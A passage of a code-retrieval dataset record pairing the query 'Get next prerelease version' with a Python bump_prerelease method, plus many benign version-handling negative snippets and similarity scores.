tag name {tag_name}\")\n latest = mat.group(1)\n return latest", "def get_version_by_number(version_manager, version_number, request):\n return version_manager.versions[version_number - 1]", "def last_available_os_version(self) -> str:\n return pulumi.get(self, \"last_available_os_version\")", "def next_available_version(self):\n pattern = \"{descriptor}_{task}_v*{ext}\".format(\n descriptor=self.descriptor, task=self.task, ext=self.extension)\n matching_scenefiles = []\n try:\n for file_ in self.folder_path.files():\n if file_.name.fnmatch(pattern):\n matching_scenefiles.append(file_)\n if not matching_scenefiles:\n return 1\n except OSError as err:\n return 1\n matching_scenefiles.sort()\n latest_scenefile = matching_scenefiles[-1]\n latest_version = latest_scenefile.name.stripext().split(\"_v\")[-1]\n return int(latest_version) + 1", "def version(self):\n self.version_list[-1] = self.revision\n version = '.'.join(self.version_list)\n return version", "def get_latest_version():\n found_version = \"unknown\"\n version_re = 
r\"^## \\[(\\d+\\.\\d+\\.\\d+)\\]\"\n\n with open(os.path.join(__repo_root__, \"CHANGELOG.md\")) as changelog_file:\n for line in changelog_file:\n found = re.search(version_re, line)\n if found:\n found_version = found.group(1)\n break\n\n return found_version", "def get_version():\n major=c_int_t(0)\n minor=c_int_t(0)\n patch=c_int_t(0)\n safe_call(backend.get().af_get_version(c_pointer(major), c_pointer(minor), c_pointer(patch)))\n return major.value,minor.value,patch.value", "def get_last_version(self):\n version = self.get_current_version()\n\n # read the recent file list\n if version is None:\n version = self.get_version_from_recent_files()\n\n return version", "def minimum_engine_version(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"minimum_engine_version\")", "def get_next_serial(self):\n T = time.gmtime()\n base = T[0] * 10000 + T[1] * 100 + T[2]\n s_base = self.serial // 100\n if s_base < base:\n return base * 100 # New day\n else:\n return self.serial + 1 # May cause future lap", "def MultiExtension_getDefaultVersion():\n return _libsbml.MultiExtension_getDefaultVersion()", "def version():\n from MotionWise.log_proc import __version__ as log_ver\n from MotionWise.pm_measurement import __version__ as pm_ver\n from MotionWise.MotionWise_perf_proxy import __version__ as proxy_ver \n from MotionWise.MotionWise_perf_client import __version__ as client_ver \n \n ver = \"$Revision: 80204 $\".split()[1]\n batch = max([ pm_instrument.version().split('.')[-1], log_ver\n , ver, pm_ver, proxy_ver, client_ver, FP.__version__])\n return \"3.0.{}\".format(batch)" ]
[ "0.8125392", "0.763029", "0.7602886", "0.7530592", "0.7165768", "0.6980305", "0.69532543", "0.69383895", "0.6928541", "0.6895772", "0.687624", "0.6815259", "0.67866236", "0.67418855", "0.67331123", "0.66247994", "0.65771586", "0.6505136", "0.64826417", "0.64826417", "0.64775634", "0.6441131", "0.6406568", "0.6388673", "0.6371166", "0.6340279", "0.6293782", "0.6293782", "0.6293782", "0.6293782", "0.6273315", "0.6267677", "0.62665534", "0.6242912", "0.6221101", "0.62210476", "0.6181439", "0.6178918", "0.61624277", "0.6139538", "0.6104586", "0.6069426", "0.6050313", "0.604466", "0.6040736", "0.60358703", "0.60334414", "0.60334414", "0.60303", "0.6021758", "0.6021634", "0.60203236", "0.60143465", "0.59886676", "0.5988019", "0.59839934", "0.5976732", "0.59461415", "0.59377784", "0.5920487", "0.59126455", "0.59018433", "0.5891533", "0.58748984", "0.5858148", "0.58425546", "0.58392733", "0.5838453", "0.58249795", "0.5821123", "0.5811597", "0.5804549", "0.5792279", "0.5791478", "0.5788727", "0.57862973", "0.57609695", "0.57559824", "0.5748249", "0.5741664", "0.57200414", "0.57157135", "0.56990707", "0.5698615", "0.56959164", "0.5695655", "0.56924164", "0.5683863", "0.5666266", "0.5662176", "0.5653844", "0.56537", "0.56513155", "0.5625864", "0.5625863", "0.5618431", "0.5617779", "0.5616031", "0.5611801", "0.56066567" ]
0.6520823
17
Get next micro version.
def bump_micro(self: _R, inc: int = 1) -> _R:
    if not self.is_stable:
        return self.get_stable().bump_micro(inc - 1)

    return self._replace(
        BaseVersion(
            epoch=0,
            release=(self.major, self.minor, self.micro + inc),
            pre=None,
            post=None,
            dev=None,
            local=None,
        )
    )
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def next_version(major=False, minor=False, patch=True):\n try:\n r = Release.objects.latest()\n except Release.DoesNotExist:\n return Version('0.0.0')\n\n v = r.version\n if major:\n v = v.next_major()\n elif minor:\n v = v.next_minor()\n else:\n v = v.next_patch()\n return v", "def next_version(self):\n try:\n release = self.release_set.order_by('-created')[0]\n except IndexError:\n return \"0.1.0\"\n\n major, minor, bugfix = release.version.split(\".\")\n\n return \"{}.{}.{}\".format(major, int(minor) + 1, bugfix)", "def test_get_next_version(self):\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual(None, ver)", "def next_version(v: str) -> str:\n vobj = Version(v)\n if vobj.is_prerelease:\n return str(vobj.base_version)\n vs = list(vobj.release)\n vs[1] += 1\n vs[2:] = [0] * len(vs[2:])\n s = \".\".join(map(str, vs))\n if vobj.epoch:\n s = f\"{vobj.epoch}!{s}\"\n return s", "def micros() -> int:", "def micro_Version(self):\n return tuple(map(ord, self._serial_io(b'\\x56', 2)[0:2]))", "def test_getNextVersion(self):\n now = date.today()\n major = now.year - VERSION_OFFSET\n version = Version(\"twisted\", major, 9, 0)\n self.assertEquals(getNextVersion(version, now=now),\n Version(\"twisted\", major, 10, 0))", "def test_get_next_version_MINOR(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR + 1, MAJOR, MINOR + 1, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR + 1, 0), ver)", "def test_get_next_version_PATCH(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR, MAJOR, MINOR, PATCH + 1): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR, PATCH + 1), ver)", "def test_getNextVersionAfterYearChange(self):\n now = date.today()\n major = now.year - VERSION_OFFSET\n version = Version(\"twisted\", major - 1, 9, 0)\n self.assertEquals(getNextVersion(version, now=now),\n Version(\"twisted\", major, 0, 0))", "def test_get_next_version_MAJOR(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR + 1, 0, MAJOR + 1, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, PATCH)))\n self.assertEqual('%d.%d-%d' % (MAJOR + 1, 0, 0), ver)", "def microversion(self, microversion):\n\n self._microversion = microversion", "def increment(version):\n release_version = os.environ.get(\"RELEASE_VERSION\", None)\n if release_version is not None:\n return release_version\n if isinstance(version, LegacyVersion):\n msg = \"\"\"{0} is considered a legacy version and does not\n support automatic incrementing. 
Please bring your version\n numbering into PEP440 standards and then it can be\n automatically incremented.\n \"\"\"\n raise Exception(msg.format(version))\n release_type = os.environ.get(\"RELEASE_TYPE\", \"micro\")\n v = version._version\n # epoch\n epoch_name, epoch = VersionUtils.get_version_number(v, 0, None, \"!\")\n pre_name, pre = VersionUtils.get_version_number(v, 3, None, \"pre\")\n post_name, post = VersionUtils.get_version_number(v, 4, None, \"post\")\n dev_name, dev = VersionUtils.get_version_number(v, 2, None, \"dev\")\n _, major = VersionUtils.get_version_number(v[1], 0, 0)\n _, minor = VersionUtils.get_version_number(v[1], 1, None)\n _, micro = VersionUtils.get_version_number(v[1], 2, None)\n\n # Handle dev/pre/post\n if release_type == \"pre\":\n micro, post, pre = VersionUtils.process_pre(micro, post, pre)\n\n if release_type == \"post\":\n dev, post = VersionUtils.process_post(dev, post)\n\n if release_type == \"dev\":\n dev = VersionUtils.process_dev(dev)\n\n if release_type == \"micro\":\n dev, micro, minor, post, pre = VersionUtils.process_micro(\n dev, micro, minor, post, pre\n )\n\n if release_type == \"minor\":\n dev, micro, minor, post, pre = VersionUtils.process_minor(\n dev, micro, minor, post, pre\n )\n\n if release_type == \"major\":\n dev, major, micro, minor, post, pre = VersionUtils.process_major(\n dev, major, micro, minor, post, pre\n )\n\n # Handle Epoch\n if release_type == \"epoch\":\n dev, epoch, major, micro, minor, post, pre = VersionUtils.process_epoch(\n dev, epoch, major, micro, minor, post, pre\n )\n\n local = \"\".join(v[5] or []) or None\n\n version_list = [major, minor, micro]\n if release_type not in [\"epoch\", \"major\", \"minor\", \"micro\", \"pre\"]:\n version_list += list(v[1][3:])\n version_string = \".\".join([str(x) for x in version_list if x or x == 0])\n\n if epoch:\n version_string = str(epoch) + epoch_name + version_string\n if pre is not None:\n version_string = VersionUtils.calc_pre_version_string(\n pre, pre_name, version_string\n )\n if post is not None:\n version_string += \".\" + post_name + str(post)\n if dev is not None:\n version_string += \".\" + dev_name + str(dev)\n if local is not None:\n version_string += \".\" + str(local)\n\n return version_string", "def test_get_next_version_PATCH99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR, MAJOR, MINOR, 100): '',\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR + 1, MAJOR, MINOR + 1, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, MINOR, 99)))\n self.assertEqual('%d.%d-%d' % (MAJOR, MINOR + 1, 0), ver)", "def get_stable(self: _R) -> _R:\n return self._replace(\n BaseVersion(\n epoch=0,\n release=(self.major, self.minor, self.micro),\n pre=None,\n post=None,\n dev=None,\n local=None,\n )\n )", "def get_prerelease_package_version(self, production: bool = False) -> str:\n rc = 1\n if describe := get_git_describe(CONFIG.mpy_path.as_posix()):\n ver, rc, _ = describe.split(\"-\")\n base = bump_version(Version(ver), minor_bump=True)\n rc = int(rc)\n return str(bump_version(base, rc=rc))\n else:\n raise ValueError(\"cannot determine next version number micropython\")", "def test_get_next_version_MAJOR99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (100, 0, 100, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((99, MINOR, PATCH)))\n self.assertEqual(None, ver)", "def get_version(self):\r\n return self._arm.get_version()", "def current_version(self):\n try:\n return 
self.release_set.order_by('-created')[0].version\n except IndexError:\n return \"0.0.0\"", "def get_version(self):\r\n\r\n return self.versions[0].number", "def previous():\n releases_list = releases()\n try:\n return releases_list[-2]\n except IndexError:\n return None", "def get_version():\n click.echo(get_current_version_number())", "def get_version_by_number(version_manager, version_number, request):\n return version_manager.versions[version_number - 1]", "def get_next_package_version(self, prod: bool = False) -> str:\n base = Version(self.pkg_version)\n if pypi_versions := get_pypi_versions(self.package_name, production=prod, base=base):\n self.pkg_version = str(pypi_versions[-1])\n return self.bump()", "def get_version():\n return \"0.0.1 (prerelease prototype)\"", "def test_get_next_version_MINOR99(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, 100, MAJOR, 100, 0): '',\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR + 1, 0, MAJOR + 1, 0, 0): '',\n })\n ver = self.u.get_next_version(version=U.UCS_Version((MAJOR, 99, 0)))\n self.assertEqual('%d.%d-%d' % (MAJOR + 1, 0, 0), ver)", "def get_version():\n return 1", "def get_version():\n return '%d.%d.%d' % version_info", "def get_uni_version(self):\n version, major_version = None, None\n response = self.get_resource(category=VERSION, no_version=True)\n if response and response.get('version'):\n version = response['version']\n version_list = version.split('.')\n major_version = version_list[0][1:] + version_list[1]\n return version, major_version", "def get_latest_version(model: str) -> str:\n if model in {\"small\", \"medium\", \"large\"}:\n model = f\"da_dacy_{model}_trf\"\n versions = [mdl.split(\"-\")[-1] for mdl in models_url if mdl.startswith(model)]\n versions = sorted(\n versions,\n key=lambda s: [int(u) for u in s.split(\".\")],\n reverse=True,\n )\n return versions[0]", "def version_max():\n return VERSION_MAX", "def _get_version(self):", "def select_latest_micro_versions(versions):\n seen_minors = set()\n res = []\n\n for ver, _ in sorted(\n versions.items(),\n # Sort by (minor_version, upload_time) in descending order\n key=lambda x: (Version(x[0]).release[:2], x[1]),\n reverse=True,\n ):\n minor_ver = Version(ver).release[:2]\n\n if minor_ver not in seen_minors:\n seen_minors.add(minor_ver)\n res.insert(0, ver)\n\n return res", "def latestidd():\n pth, _ = run_functions.install_paths(\n version=\"8.8.0\"\n ) # works with any value in version\n dirpth = os.path.dirname(pth)\n dirpth = os.path.dirname(dirpth)\n alldirs = os.listdir(dirpth)\n eplusdirs = [dir for dir in alldirs if dir.startswith(\"EnergyPlus\")]\n maxapp = max(eplusdirs)\n ver = folder2ver(maxapp)\n return ver", "def api_version() -> APIVersion:\n return MAX_SUPPORTED_VERSION", "def get_machine_version():\n return get_file_content(\"/home/pi/.machineconfig/latest_version\")", "def get_version():\n return magpy.get_version()", "def latestidd():\n pth, _ = run_functions.install_paths(version='8.8.0') # works with any value in version\n dirpth = os.path.dirname(pth)\n dirpth = os.path.dirname(dirpth)\n alldirs = os.listdir(dirpth)\n eplusdirs = [dir for dir in alldirs if dir.startswith('EnergyPlus')]\n maxapp = max(eplusdirs)\n ver = folder2ver(maxapp)\n return ver", "def get_version(self):\n return self.__make_api_call('get/version')", "def __getattr__(self, name):\n if name in ('epoch', 'release', 'pre', ):\n return getattr(self._version, name)\n if name in ('post', 'dev'):\n attr = getattr(self._version, name)\n return attr[1] if attr else None\n if name 
== 'is_devrelease':\n return self.dev is not None\n\n parts = ('major', 'minor', 'micro')\n try:\n index = parts.index(name)\n except ValueError:\n raise AttributeError('{!r} object has to attribute {!r}'\n .format(type(self).__name__, name)) from None\n release = self.release\n return release[index] if len(release) >= index + 1 else 0", "def next_version(file_):\n split_file = file_.rsplit(\"_\", 1)\n name_file = split_file[0]\n version = split_file[-1]\n padding = len(version)\n\n if version.isdigit():\n next_version = int(version) + 1\n next_version = str(next_version).zfill(padding)\n\n return concat(name_file, next_version, separator=\"_\")\n else:\n e = concat(file_, \" is incorrect.\")\n raise ValueError(e)", "def get_version():\n\n with open('yubico/yubico_version.py', 'r') as f:\n match = VERSION_PATTERN.search(f.read())\n return match.group(1)", "def calculate_new_release_version(version):\n split_version_string = version.split(\".\")\n part_zero = split_version_string[0]\n part_one = int(split_version_string[1]) + 1\n part_two = split_version_string[2]\n new_version = f\"{part_zero}.{part_one}.{part_two}\"\n return new_version", "def version_min():\n return VERSION_MIN", "def version(inp):\n uptime = (arrow.now() - BOOTTIME)\n m, s = divmod(uptime.seconds, 60)\n h, m = divmod(m, 60)\n return lex.version(\n version=__version__, days=uptime.days, hours=h, minutes=m)", "def current_version(self):\n if self.current_tag:\n version = self.current_tag.lstrip('v')\n else:\n version = None\n\n if version and not version_is_valid(version):\n version = None\n\n return version", "def get_version(self):\n url = '{}/v2/version'.format(self.url)\n try:\n r = requests.get(url)\n if r.status_code == 200:\n return r.json()['version']\n except Exception as e:\n pass\n return ''", "def get_version(self):\n\t\treturn call_sdk_function('PrlApi_GetVersion')", "def get_version(self):\n url = '{}/version'.format(self.url)\n try:\n r = requests.get(url)\n if r.status_code == 200:\n return r.json()['orionld version']\n except Exception as e:\n pass\n return ''", "def version(self):\n\n if self.running() is True:\n return APIConsumer.get(\"/version\").content\n else:\n return None", "def get_current_version(self) -> str:\n raise NotImplementedError()", "def getversion():\r\n\r\n global VERSION\r\n\r\n if len(VERSION) == 3:\r\n return '{}.{}.{}'.format(VERSION[0], VERSION[1], VERSION[2])\r\n else:\r\n return '{}.{}.{}-{}'.format(VERSION[0], VERSION[1], VERSION[2], VERSION[3])", "def get_version(self):\n res = requests.get(self.base_url + '/version')\n\n return res", "def get_release(self, is_vertebrate: bool) -> int:\n ext = \"/info/data/?\" if is_vertebrate else \"/info/eg_version?\"\n ret = retry(request_json, 3, self._url, ext)\n return int(ret[\"releases\"][0] if is_vertebrate else ret[\"version\"])", "def get_version():\r\n return '.'.join((str(each) for each in VERSION[:3]))", "def latest_release_get():\n try:\n return json_response.success({'version': version.latest_version()})\n except version.Error as e:\n return json_response.error(str(e)), 200", "def version(self):\n data = self._ftdi.spi_read(self.VERSION_ADDR, len=1, burst='fixed')\n return data[0] & self.VERSION_MASK", "def version_number() -> int:\n return 0", "def get_version(version=None):\n if version is None:\n version = VERSION\n assert len(version) == 5\n assert version[3] in (\"alpha\", \"beta\", \"rc\", \"final\")\n\n parts = 2 if version[2] == 0 else 3\n main = \".\".join(str(digit) for digit in version[:parts])\n\n sub = \"\"\n if 
version[3] != \"final\":\n mapping = {\"alpha\": \"a\", \"beta\": \"b\", \"rc\": \"rc\"}\n sub = mapping[version[3]] + str(version[4])\n\n return main + sub", "def get_current_version(self):\n raise NotImplementedError(\"get_current_version is not implemented\")", "def get_version(self):\n url = '{}/version'.format(self.url)\n try:\n r = requests.get(url)\n if r.status_code == 200:\n return r.json()['version']\n except Exception as e:\n pass\n return ''", "def version(self) -> 'outputs.VersionResponse':\n return pulumi.get(self, \"version\")", "def reader_version(self):\n\n try:\n result, sw1, sw2 = self.apdu_plain(b\"\\xff\\x00\\x48\\x00\\x00\")\n if len(result) > 0:\n str_result = result + bytes([sw1]) + bytes([sw2])\n str_result = str_result.decode(\"utf-8\")\n return str_result\n except Exception as e:\n print(\"Get version error:\", e)\n return \"n/a\"", "def get_version():\n ver = '0.0.0'\n req = restcall(0, 'config', 10.0)\n if req['text'] is not None:\n try: \n tree = ET.fromstring(req['text'])\n ver = tree.findall('app_version')[0].text\n if ver is None:\n ver = '0.0.0'\n _LOGGER.info(\"ISY: firmware version: %s\", ver)\n except ET.ParseError:\n _LOGGER.error(\"No version information found on ISY.\")\n return ver", "def get_arm_version(self):\n ret = None\n build = self.parent._build\n if build is not None:\n ret = build[0]\n\n return ret", "def get_latest_release(self):\n cs = Custom_Soup(\n \"latest_release\", \"https://chromedriver.storage.googleapis.com/LATEST_RELEASE_\" + str(self.version))\n cs.get_request()\n self.latest_release = cs.get_text()", "def choose_version(self):\n if len(self.unused_versions) == 0:\n self.unused_versions = list(range(len(self.versions)))\n idx = np.random.choice(self.unused_versions)\n self.unused_versions.remove(idx)\n version = self.versions[idx]\n return version", "def get_latest_vsn(self):\n # The last version in the list should be the newest one.\n if len(self.versions) > 0:\n v = sorted(self.versions, key=lambda v: int(v['id']))[len(self.versions)-1]\n return self.get_version(v['id'])\n else: return None", "def _fetch_old_version(self) -> None:\n if self.version is None:\n try:\n r = fetch(self.api + '?version&format=json')\n try:\n d = r.json()\n except JSONDecodeError:\n # Fallback for old versions which didn't wrap help in json\n d = {'error': {'*': r.text}}\n\n self.version = list(filter(\n lambda x: x.startswith('MediaWiki'),\n (line.strip()\n for line in d['error']['*'].split('\\n'))))[0].split()[1]\n except Exception:\n pass\n else:\n self.version = MediaWikiVersion(self.version)", "def version(self):\n self.version_list[-1] = self.revision\n version = '.'.join(self.version_list)\n return version", "def get_next_serial(self):\n T = time.gmtime()\n base = T[0] * 10000 + T[1] * 100 + T[2]\n s_base = self.serial // 100\n if s_base < base:\n return base * 100 # New day\n else:\n return self.serial + 1 # May cause future lap", "def getCurrentVersion():\n f_version = configManagement.currentVersion()\n return f_version", "def semver():\n return \".\".join([str(v) for v in VERSION])", "def get_version_number():\n return [0, 1, 0]", "def next_available_version(self):\n pattern = \"{descriptor}_{task}_v*{ext}\".format(\n descriptor=self.descriptor, task=self.task, ext=self.extension)\n matching_scenefiles = []\n try:\n for file_ in self.folder_path.files():\n if file_.name.fnmatch(pattern):\n matching_scenefiles.append(file_)\n if not matching_scenefiles:\n return 1\n except OSError as err:\n return 1\n matching_scenefiles.sort()\n 
latest_scenefile = matching_scenefiles[-1]\n latest_version = latest_scenefile.name.stripext().split(\"_v\")[-1]\n return int(latest_version) + 1", "def last_n_ver(seq, n):\r\n return first_n_ver(list(reversed(seq)), n)", "def get_new_version(version, IS_ARCHIVE, IS_RELEASE):\n\n if not IS_ARCHIVE and not IS_RELEASE:\n return version\n\n version_split = version.split('.')\n version_split_sigfigs = len(version_split)\n\n # ARCHIVE\n if IS_ARCHIVE:\n if version_split_sigfigs == 2:\n version_split[1] = str(0)\n else:\n del version_split[-1]\n version = \".\".join(version_split)\n return version\n\n # Release\n else:\n version_split[version_split_sigfigs-1] = str(int(version_split[version_split_sigfigs-1]) + 1)\n return \".\".join(version_split)", "def get_version():\n return \".\".join([str(i) for i in config[\"version\"]])", "def latest_version_number(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"latest_version_number\")", "def _GetVersion(version_str):\n return int(version_str.split('.')[1])", "def GetVersion(self):\n return self._SendRequest(HTTP_GET, \"/version\", None, None)", "def get_version(version=VERSION, date=DATE):\n return \"JoMRS v{} Modular Rigging System | last update {}\".format(\n \".\".join([i for i in version]), \"/\".join([x for x in date])\n )", "def version():\n from MotionWise.log_proc import __version__ as log_ver\n from MotionWise.pm_measurement import __version__ as pm_ver\n from MotionWise.MotionWise_perf_proxy import __version__ as proxy_ver \n from MotionWise.MotionWise_perf_client import __version__ as client_ver \n \n ver = \"$Revision: 80204 $\".split()[1]\n batch = max([ pm_instrument.version().split('.')[-1], log_ver\n , ver, pm_ver, proxy_ver, client_ver, FP.__version__])\n return \"3.0.{}\".format(batch)", "def Hello(self):\n version = '1.5.3'\n print 'returned version number', version\n return version", "def getAPIVersion(self, req):\n import re\n import tracrpc\n match = re.match(r'([0-9]+)\\.([0-9]+)\\.([0-9]+)', tracrpc.__version__)\n return map(int, match.groups())", "def get_version():\r\n return __version__", "def get_current_release():\n return _CURRENT_RELEASE", "def get_ver(self, bootdefault):\n module = 'version/oper'\n method = 'GET'\n response = self.axapi_call(module, method)\n installedver = response.json()['version']['oper'][bootdefault]\n print(self.device + ' The version currently installed on ' + bootdefault + ' is: ' + installedver)", "def get_version(self):\n pass", "def get_version():\n return '.'.join(map(str, VERSION))", "def get_version():\n vers = [\"%(major)i.%(minor)i\" % __version_info__, ]\n\n if __version_info__['micro']:\n vers.append(\".%(micro)i\" % __version_info__)\n if __version_info__['releaselevel'] != 'final':\n vers.append('%(releaselevel)s' % __version_info__)\n return ''.join(vers)", "def _get_next_work_file_version(self, work_template, fields):\n existing_versions = self.parent.tank.paths_from_template(work_template, fields, [\"version\"])\n version_numbers = [work_template.get_fields(v).get(\"version\") for v in existing_versions]\n curr_v_no = fields[\"version\"]\n max_v_no = max(version_numbers)\n return max(curr_v_no, max_v_no) + 1", "def get_version(self):\n return self.http_call(\"get\", url=f\"{self.base_url}/version\").json()", "def query_version(self):\n return self.connection.cursor().execute('SELECT version()').fetchone()[0]", "def get_version(self) -> str:\n self.serial.write(b\"B!\")\n serial_number = self.__extract_string(self.__read_response(1)[0], b\"!V\")\n return serial_number", "def 
get_version():\n return __version__", "def get_version():\n return __version__", "def get_version():\n return __version__", "def Version(self) -> _n_0_t_12:", "def Version(self) -> _n_0_t_12:" ]
[ "0.6825203", "0.6565859", "0.6408749", "0.6236738", "0.6216092", "0.60519856", "0.60511297", "0.6045051", "0.5854707", "0.5835003", "0.58286273", "0.577659", "0.57726276", "0.5756602", "0.5756459", "0.5703252", "0.56749344", "0.5653698", "0.5628476", "0.5624355", "0.5614559", "0.5603638", "0.55932724", "0.5578742", "0.5536794", "0.55328876", "0.5523858", "0.5514526", "0.5513861", "0.5492878", "0.54846454", "0.5474986", "0.54634804", "0.5420669", "0.541072", "0.5403469", "0.53930324", "0.5386563", "0.53848225", "0.53381485", "0.5337033", "0.5324503", "0.531605", "0.53028476", "0.5302816", "0.5297405", "0.5295469", "0.5290586", "0.52892506", "0.52832055", "0.52692056", "0.5267888", "0.52604413", "0.5257046", "0.52557564", "0.524218", "0.5227809", "0.5224113", "0.5223514", "0.52060056", "0.5205032", "0.51966774", "0.5176045", "0.51743835", "0.5171906", "0.51687795", "0.5164635", "0.51621836", "0.5159392", "0.51570886", "0.51569515", "0.5150659", "0.5148223", "0.5134928", "0.51335585", "0.51335526", "0.5133171", "0.51302475", "0.5125939", "0.51194155", "0.51174605", "0.5115234", "0.5111017", "0.510838", "0.5107075", "0.5105755", "0.50998664", "0.50961685", "0.5094548", "0.5089275", "0.50789493", "0.5077525", "0.5076629", "0.50751156", "0.5073244", "0.5062743", "0.5062743", "0.5062743", "0.5060046", "0.5060046" ]
0.6671826
1
Get next prerelease version. If the version is stable, bump `micro` as well for proper versioning. Defaults to `rc` prereleases.
def bump_prerelease(
    self: _R,
    inc: int = 1,
    release_type: Literal["rc", "alpha", "beta", "a", "b"] = None,
    bump_release: Literal["major", "minor", "micro"] = VersionParts.MICRO,
) -> _R:
    prerelease_type = release_type or self.prerelease_type or VersionParts.RC
    increment = inc if not self.base.pre else (max(self.base.pre[-1], 1) + inc)
    pre = (prerelease_type, increment)
    new_version = self._replace(self._copy_base(pre=pre))
    if new_version < self:
        prerelease_type = release_type or VersionParts.RC
        new_version = self.get_stable().bump_release(bump_release)
        if prerelease_type != self.prerelease_type:
            increment = inc
    base = BaseVersion(
        epoch=0,
        release=new_version.base.release,
        pre=(prerelease_type, increment),
        post=None,
        dev=None,
        local=None,
    )
    return self._replace(base)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def next_version(major=False, minor=False, patch=True):\n try:\n r = Release.objects.latest()\n except Release.DoesNotExist:\n return Version('0.0.0')\n\n v = r.version\n if major:\n v = v.next_major()\n elif minor:\n v = v.next_minor()\n else:\n v = v.next_patch()\n return v", "def get_prerelease_package_version(self, production: bool = False) -> str:\n rc = 1\n if describe := get_git_describe(CONFIG.mpy_path.as_posix()):\n ver, rc, _ = describe.split(\"-\")\n base = bump_version(Version(ver), minor_bump=True)\n rc = int(rc)\n return str(bump_version(base, rc=rc))\n else:\n raise ValueError(\"cannot determine next version number micropython\")", "def next_version(self):\n try:\n release = self.release_set.order_by('-created')[0]\n except IndexError:\n return \"0.1.0\"\n\n major, minor, bugfix = release.version.split(\".\")\n\n return \"{}.{}.{}\".format(major, int(minor) + 1, bugfix)", "def get_next_package_version(self, prod: bool = False) -> str:\n base = Version(self.pkg_version)\n if pypi_versions := get_pypi_versions(self.package_name, production=prod, base=base):\n self.pkg_version = str(pypi_versions[-1])\n return self.bump()", "def increment(version):\n release_version = os.environ.get(\"RELEASE_VERSION\", None)\n if release_version is not None:\n return release_version\n if isinstance(version, LegacyVersion):\n msg = \"\"\"{0} is considered a legacy version and does not\n support automatic incrementing. Please bring your version\n numbering into PEP440 standards and then it can be\n automatically incremented.\n \"\"\"\n raise Exception(msg.format(version))\n release_type = os.environ.get(\"RELEASE_TYPE\", \"micro\")\n v = version._version\n # epoch\n epoch_name, epoch = VersionUtils.get_version_number(v, 0, None, \"!\")\n pre_name, pre = VersionUtils.get_version_number(v, 3, None, \"pre\")\n post_name, post = VersionUtils.get_version_number(v, 4, None, \"post\")\n dev_name, dev = VersionUtils.get_version_number(v, 2, None, \"dev\")\n _, major = VersionUtils.get_version_number(v[1], 0, 0)\n _, minor = VersionUtils.get_version_number(v[1], 1, None)\n _, micro = VersionUtils.get_version_number(v[1], 2, None)\n\n # Handle dev/pre/post\n if release_type == \"pre\":\n micro, post, pre = VersionUtils.process_pre(micro, post, pre)\n\n if release_type == \"post\":\n dev, post = VersionUtils.process_post(dev, post)\n\n if release_type == \"dev\":\n dev = VersionUtils.process_dev(dev)\n\n if release_type == \"micro\":\n dev, micro, minor, post, pre = VersionUtils.process_micro(\n dev, micro, minor, post, pre\n )\n\n if release_type == \"minor\":\n dev, micro, minor, post, pre = VersionUtils.process_minor(\n dev, micro, minor, post, pre\n )\n\n if release_type == \"major\":\n dev, major, micro, minor, post, pre = VersionUtils.process_major(\n dev, major, micro, minor, post, pre\n )\n\n # Handle Epoch\n if release_type == \"epoch\":\n dev, epoch, major, micro, minor, post, pre = VersionUtils.process_epoch(\n dev, epoch, major, micro, minor, post, pre\n )\n\n local = \"\".join(v[5] or []) or None\n\n version_list = [major, minor, micro]\n if release_type not in [\"epoch\", \"major\", \"minor\", \"micro\", \"pre\"]:\n version_list += list(v[1][3:])\n version_string = \".\".join([str(x) for x in version_list if x or x == 0])\n\n if epoch:\n version_string = str(epoch) + epoch_name + version_string\n if pre is not None:\n version_string = VersionUtils.calc_pre_version_string(\n pre, pre_name, version_string\n )\n if post is not None:\n version_string += \".\" + post_name + str(post)\n if dev 
is not None:\n version_string += \".\" + dev_name + str(dev)\n if local is not None:\n version_string += \".\" + str(local)\n\n return version_string", "def next_version(v: str) -> str:\n vobj = Version(v)\n if vobj.is_prerelease:\n return str(vobj.base_version)\n vs = list(vobj.release)\n vs[1] += 1\n vs[2:] = [0] * len(vs[2:])\n s = \".\".join(map(str, vs))\n if vobj.epoch:\n s = f\"{vobj.epoch}!{s}\"\n return s", "def get_version(version=None):\n if version is None:\n version = VERSION\n assert len(version) == 5\n assert version[3] in (\"alpha\", \"beta\", \"rc\", \"final\")\n\n parts = 2 if version[2] == 0 else 3\n main = \".\".join(str(digit) for digit in version[:parts])\n\n sub = \"\"\n if version[3] != \"final\":\n mapping = {\"alpha\": \"a\", \"beta\": \"b\", \"rc\": \"rc\"}\n sub = mapping[version[3]] + str(version[4])\n\n return main + sub", "def get_version():\n return \"0.0.1 (prerelease prototype)\"", "def get_new_version(version, IS_ARCHIVE, IS_RELEASE):\n\n if not IS_ARCHIVE and not IS_RELEASE:\n return version\n\n version_split = version.split('.')\n version_split_sigfigs = len(version_split)\n\n # ARCHIVE\n if IS_ARCHIVE:\n if version_split_sigfigs == 2:\n version_split[1] = str(0)\n else:\n del version_split[-1]\n version = \".\".join(version_split)\n return version\n\n # Release\n else:\n version_split[version_split_sigfigs-1] = str(int(version_split[version_split_sigfigs-1]) + 1)\n return \".\".join(version_split)", "def test_get_next_version_PATCH(self):\n self._uri({\n '%d.%d/maintained/%d.%d-%d/' % (MAJOR, MINOR, MAJOR, MINOR, PATCH + 1): '',\n })\n ver = 